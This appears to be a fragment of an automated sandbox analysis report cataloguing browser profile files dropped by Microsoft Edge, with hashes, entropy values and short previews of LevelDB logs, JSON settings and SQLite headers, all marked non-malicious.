                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):524656
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.027445846313988E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsulLn0alll:Ls+rlll
                                                                                                                                                                                                                                                                                  MD5:E825BC86D66D65C785F7B5A7154D3B7A
                                                                                                                                                                                                                                                                                  SHA1:6CF63AD7C26D24CA8FF2517C559F60EF0EE898A4
                                                                                                                                                                                                                                                                                  SHA-256:5A083BFE30C3D57A96F481864BC8F4C3C1DDEBBD42988729AF885B82B858AFFE
                                                                                                                                                                                                                                                                                  SHA-512:A22BF870FDD48A046384D0511FA1447AA129DA501320624D2259A8E31F34DB503DA88DB51A4AE7CD810AECC80AE5CA887C1FC6EDD2B4CFF17F098195EBC59619
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNltiull:Ls3Qull
                                                                                                                                                                                                                                                                                  MD5:5BD064DE8E69BD13E9EAEECE94543CF8
                                                                                                                                                                                                                                                                                  SHA1:9D053DCF97BD429171776AE4BFA205D28208C8CB
                                                                                                                                                                                                                                                                                  SHA-256:8C216DBB49897B78BC94557E631168BDD501354E3E950EAEE05419BE3B2A8E48
                                                                                                                                                                                                                                                                                  SHA-512:5CCC2EB6A973665C9EE4B979556D39AC56BA343F3A4667234B347F3F3E3EEC4BD946E5F1908C60B4047332E076903A50C4645C713E9463F2A976351A64B9BE5A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.230250648128074
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:73gN+vYfYebvqBQFUt8O3Z/+O3dPNV5JfYebvqBvJ:73g6YfYebvZg8O3N3dNJfYebvk
                                                                                                                                                                                                                                                                                  MD5:89A6C314385948B082887627EA4C8BA6
                                                                                                                                                                                                                                                                                  SHA1:8785A922AFF3E12DE4426F5C23F974BB911870FF
                                                                                                                                                                                                                                                                                  SHA-256:2667901559DF3523D05671CE7E98969973B373BD7F68AED90BD0BA98C4E1FDC1
                                                                                                                                                                                                                                                                                  SHA-512:FE4B8194AA3D106BEA92F987305E372AC2296EFA30F5C1EE9EA34061B686A1FFFF46442CF2314DC6D4FE50CAB1B296A9EFD93861C1CF28824959C7B9AF054819
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:29.743 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:41:29.744 1f7c Recovering log #3.2024/12/10-12:41:29.751 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):193
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.864047146590611
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                                                                                                                                                  MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                                                                                                                                                  SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                                                                                                                                                  SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                                                                                                                                                  SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.555790634850688
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                                                                                                                                                  MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                                                                                                                                                  SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                                                                                                                                                  SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                                                                                                                                                  SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                  MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                                                                                  SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                  SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                  SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                  MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                  SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                  SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                  SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):420
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.197205941242622
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7MrN+vYfYebvqBZFUt8O7/+O/V5JfYebvqBaJ:7MuYfYebvyg8OP/JfYebvL
                                                                                                                                                                                                                                                                                  MD5:340D0816C7A44A1DEF1AC73F7BF44D20
                                                                                                                                                                                                                                                                                  SHA1:CFF6BA9DD7D6F3192BC9EA30C387598A2767C83B
                                                                                                                                                                                                                                                                                  SHA-256:55A5F68F48DCCCB3AFDB4810BE588A5470440F560FB9591915AABD4FB75D4CC7
                                                                                                                                                                                                                                                                                  SHA-512:80310C521B02DCAB0859A0A3E08952DFB5667A699D7288C41C2563D601DB96F1A5B25401FD6A2EDA580D12293578C5F9482CACE4C31A025C183438DC2433E450
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:47.141 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-12:41:47.144 1f7c Recovering log #3.2024/12/10-12:41:47.148 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):420
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.197205941242622
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:7MrN+vYfYebvqBZFUt8O7/+O/V5JfYebvqBaJ:7MuYfYebvyg8OP/JfYebvL
                                                                                                                                                                                                                                                                                  MD5:340D0816C7A44A1DEF1AC73F7BF44D20
                                                                                                                                                                                                                                                                                  SHA1:CFF6BA9DD7D6F3192BC9EA30C387598A2767C83B
                                                                                                                                                                                                                                                                                  SHA-256:55A5F68F48DCCCB3AFDB4810BE588A5470440F560FB9591915AABD4FB75D4CC7
                                                                                                                                                                                                                                                                                  SHA-512:80310C521B02DCAB0859A0A3E08952DFB5667A699D7288C41C2563D601DB96F1A5B25401FD6A2EDA580D12293578C5F9482CACE4C31A025C183438DC2433E450
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:2024/12/10-12:41:47.141 1f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/10-12:41:47.144 1f7c Recovering log #3.2024/12/10-12:41:47.148 1f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.209070016793372
                                                                                                                                                                                                                                                                                  Encrypted:false
